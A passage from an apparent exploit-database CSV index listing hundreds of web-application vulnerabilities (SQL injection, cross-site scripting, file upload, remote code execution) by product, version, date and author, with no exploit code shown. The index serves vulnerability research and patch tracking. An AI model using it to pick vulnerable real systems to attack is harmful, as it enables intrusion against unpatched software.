5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)",2011-10-04,"Aung Khant",php,webapps, -36204,exploits/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",php,webapps, -36208,exploits/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' SQL Injection",2011-10-15,"Aung Khant",php,webapps, -36262,exploits/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps, -36244,exploits/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps, -36245,exploits/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps, -36213,exploits/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps, -36214,exploits/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps, -36215,exploits/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' SQL Injection",2011-10-09,"BHG Security Center",php,webapps, -36216,exploits/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusions",2011-10-10,indoushka,php,webapps, -36220,exploits/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' SQL Injection",2011-10-11,CoBRa_21,php,webapps, -36221,exploits/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' SQL Injection",2011-10-11,CoBRa_21,php,webapps, -36222,exploits/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' SQL Injection",2011-10-11,CoBRa_21,php,webapps, -36223,exploits/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusions",2011-10-11,indoushka,php,webapps, -36224,exploits/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps, -36225,exploits/php/webapps/36225.txt,"ContaoCMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps, -36226,exploits/php/webapps/36226.txt,"Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps, -36227,exploits/php/webapps/36227.txt,"Joomla! Component com_sgicatalog 1.0 - 'id' SQL Injection",2011-10-12,"BHG Security Center",php,webapps, -36228,exploits/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps, -36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps, -36231,exploits/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,php,webapps, -36232,exploits/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 -36233,exploits/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps, -36236,exploits/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,php,webapps, -36237,exploits/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps, -36240,exploits/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps, -36241,exploits/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps, -36242,exploits/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps, -36243,exploits/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps, -36248,exploits/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,php,webapps, -36249,exploits/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps, -36251,exploits/php/webapps/36251.txt,"PHPMoAdmin - Unauthorized Remote Code Execution",2015-03-03,@u0x,php,webapps,80 -36252,exploits/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps, -36253,exploits/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps, -36254,exploits/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusions",2011-10-25,"Null H4ck3r",php,webapps, -36255,exploits/php/webapps/36255.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2011-10-26,LiquidWorm,php,webapps, -36259,exploits/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",php,webapps, -36265,exploits/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 -36269,exploits/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps, -36270,exploits/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps, -36272,exploits/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps, -36273,exploits/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusions",2011-11-01,indoushka,php,webapps, -36275,exploits/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps, -36277,exploits/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Cross-Site Scripting",2011-11-01,Isfahan,php,webapps, -36278,exploits/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps, -36282,exploits/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",php,webapps, -36283,exploits/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps, -36280,exploits/php/webapps/36280.txt,"Symphony 2.2.3 - '/symphony/publish/images?filter' Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps, -36281,exploits/php/webapps/36281.txt,"Symphony 2.2.3 - '/symphony/publish/comments?filter' SQL Injection",2011-11-01,"Mesut Timur",php,webapps, -36284,exploits/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps, -36286,exploits/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps, -36287,exploits/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Cross-Site Scripting",2011-11-04,3spi0n,php,webapps, -36289,exploits/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps, -36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps, -36292,exploits/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Directory Traversal",2011-11-07,Buherátor,java,webapps, -36293,exploits/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps, -36295,exploits/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps, -36297,exploits/php/webapps/36297.txt,"AShop - Open Redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps, -36298,exploits/php/webapps/36298.txt,"Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps, -36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps, -36301,exploits/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps, -36302,exploits/php/webapps/36302.txt,"Joomla! Component Content - 'year' SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps, -36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 -36305,exploits/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps, -36306,exploits/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps, -36307,exploits/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - 'admin_index.php?site_name' Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps, -36308,exploits/php/webapps/36308.txt,"Webistry 1.6 - 'pid' SQL Injection",2011-11-16,CoBRa_21,php,webapps, -36314,exploits/php/webapps/36314.txt,"webERP 4.3.8 - '/reportwriter/ReportMaker.php?reportid' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps, -36315,exploits/php/webapps/36315.txt,"webERP 4.3.8 - '/reportwriter/FormMaker.php?ReportID' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps, -36316,exploits/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps, -36317,exploits/php/webapps/36317.txt,"WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting",2011-11-17,Am!r,php,webapps, -36320,exploits/php/webapps/36320.txt,"CodoForum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 -36321,exploits/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 -36322,exploits/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' SQL Injection",2011-11-20,tempe_mendoan,php,webapps, -36323,exploits/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,php,webapps, -36324,exploits/php/webapps/36324.txt,"WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting",2011-11-21,Amir,php,webapps, -36325,exploits/php/webapps/36325.txt,"WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting",2011-11-21,Am!r,php,webapps, -36326,exploits/php/webapps/36326.txt,"WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting",2011-11-21,Amir,php,webapps, -36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,php,webapps, -36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps, -36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",php,webapps, -36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps, -36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps, -36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps, -36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,php,webapps, -36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,php,webapps, -36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,php,webapps, -36341,exploits/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps, -40008,exploits/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 -36342,exploits/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/googlemap.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps, -36343,exploits/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition' Cross-Site Scripting",2011-11-23,Prestashop,php,webapps, -36344,exploits/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps, -36345,exploits/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps, -36346,exploits/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps, -36347,exploits/php/webapps/36347.txt,"Hastymail2 - 'rs' Cross-Site Scripting",2011-11-22,HTrovao,php,webapps, -36348,exploits/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,php,webapps, -36349,exploits/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,php,webapps, -36350,exploits/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php?hal' SQL Injection",2011-11-24,X-Cisadane,php,webapps, -36351,exploits/php/webapps/36351.txt,"Balitbang CMS 3.3 - 'alumni.php?hal' SQL Injection",2011-11-24,X-Cisadane,php,webapps, -36353,exploits/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - '/nnm/mibdiscover?node' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps, -36354,exploits/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/configurationpoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps, -36355,exploits/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/ping.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps, -36356,exploits/jsp/webapps/36356.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/statuspoll.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps, -36357,exploits/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - 'nnm/protected/traceroute.jsp?nodename' Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps, -36358,exploits/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps, -36362,exploits/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps, -36363,exploits/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting",2011-11-28,Amir,php,webapps, -36364,exploits/php/webapps/36364.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps, -36365,exploits/php/webapps/36365.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps, -36366,exploits/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps, -36367,exploits/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps, -36368,exploits/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps, -36369,exploits/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps, -36371,exploits/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps, -36372,exploits/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps, -36373,exploits/php/webapps/36373.txt,"Joomla! Component com_simplephotogallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps, -36374,exploits/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps, -36375,exploits/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps, -36379,exploits/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps, -36380,exploits/php/webapps/36380.txt,"OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php' URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps, -36381,exploits/php/webapps/36381.txt,"OrangeHRM 2.6.11 - '/lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps, -36382,exploits/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps, -36383,exploits/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps, -36384,exploits/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",php,webapps, -36385,exploits/php/webapps/36385.txt,"Joomla! Component com_simplephotogallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps, -36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps, -36406,exploits/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php?task' Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps, -36481,exploits/php/webapps/36481.txt,"WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps, -36407,exploits/php/webapps/36407.txt,"Elxis CMS 2009 - 'administrator/index.php' URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps, -36408,exploits/php/webapps/36408.txt,"WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps, -36410,exploits/php/webapps/36410.txt,"Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps, -36413,exploits/php/webapps/36413.txt,"WordPress Plugin SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps, -36401,exploits/php/webapps/36401.txt,"AtMail 1.04 - 'func' Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps, -36402,exploits/asp/webapps/36402.txt,"Hero 3.69 - 'month' Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps, -36414,exploits/php/webapps/36414.txt,"WordPress Plugin WPML 3.1.9 - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 -36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps, -36483,exploits/php/webapps/36483.txt,"WordPress Plugin WP Live.php 1.2.1 - 's' Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps, -36484,exploits/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps, -36485,exploits/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting",2012-01-02,sonyy,php,webapps, -36486,exploits/php/webapps/36486.txt,"Tienda Virtual - 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps, -36418,exploits/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps, -36419,exploits/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 -36423,exploits/java/webapps/36423.txt,"Websense Appliance Manager - Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 -36432,exploits/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps, -36434,exploits/php/webapps/36434.txt,"WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps, -36435,exploits/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 -36436,exploits/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps, -36439,exploits/php/webapps/36439.txt,"Joomla! Component ECommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 -36440,exploits/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 -36441,exploits/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 -36442,exploits/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps, -36444,exploits/php/webapps/36444.txt,"WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps, -36445,exploits/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps, -36446,exploits/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps, -36447,exploits/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps, -36448,exploits/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps, -36449,exploits/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps, -36450,exploits/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps, -36451,exploits/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps, -40870,exploits/php/webapps/40870.txt,"WordPress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps, -36453,exploits/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps, -36454,exploits/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps, -36456,exploits/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps, -36457,exploits/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps, -36458,exploits/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps, -36459,exploits/cgi/webapps/36459.txt,"Websense 7.6 Products - 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",cgi,webapps, -36460,exploits/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' SQL Injection",2011-12-17,Lazmania61,php,webapps, -36461,exploits/php/webapps/36461.txt,"Social Network Community 2 - 'userID' SQL Injection",2011-12-17,Lazmania61,php,webapps, -36462,exploits/php/webapps/36462.txt,"Video Community Portal - 'userID' SQL Injection",2011-12-18,Lazmania61,php,webapps, -36463,exploits/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps, -36464,exploits/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps, -36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps, -36468,exploits/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Cross-Site Scripting",2011-12-19,G13,php,webapps, -36469,exploits/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' SQL Injection",2011-12-20,CoBRa_21,php,webapps, -36470,exploits/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps, -36471,exploits/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injections",2011-12-20,"High-Tech Bridge SA",php,webapps, -36472,exploits/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' SQL Injection",2011-12-20,CoBRa_21,php,webapps, -36473,exploits/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps, -36474,exploits/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps, -36478,exploits/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps, -36506,exploits/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps, -36487,exploits/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps, -36488,exploits/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps, -36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps, -36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps, -36492,exploits/php/webapps/36492.txt,"GraphicsClone Script - 'term' Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps, -36493,exploits/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",php,webapps, -36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps, -36495,exploits/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' SQL Injection",2011-12-29,SiteWatch,php,webapps, -36496,exploits/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps, -36497,exploits/php/webapps/36497.txt,"UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting",2012-01-04,sonyy,php,webapps, -36498,exploits/php/webapps/36498.txt,"Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps, -36499,exploits/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps, -36508,exploits/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps, -36509,exploits/php/webapps/36509.txt,"SQLiteManager 1.2.4 - 'main.php?dbsel' Cross-Site 